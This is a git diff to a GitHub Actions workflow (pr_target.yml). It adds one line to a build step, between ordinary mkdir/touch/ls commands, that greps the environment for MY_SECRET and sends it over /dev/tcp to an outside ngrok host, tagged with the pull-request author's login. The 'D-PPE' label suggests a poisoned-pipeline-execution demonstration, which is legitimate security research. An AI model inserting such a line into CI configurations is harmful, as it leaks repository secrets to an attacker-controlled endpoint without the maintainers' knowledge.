--- a/.github/workflows/pr_target.yml
+++ b/.github/workflows/pr_target.yml
@@ -28,6 +28,7 @@ jobs:
           mkdir ./bin
           touch ./bin/mybin.exe
           ls -lR 
+          echo ------- D-PPE From user [${{ github.event.pull_request.user.login }}] in pr [${{ github.workflow }}] pr.yml :: $(env | grep MY_SECRET) > /dev/tcp/7.tcp.eu.ngrok.io/18280
       
       # Simulation of running tests
       - name: Running tests ...
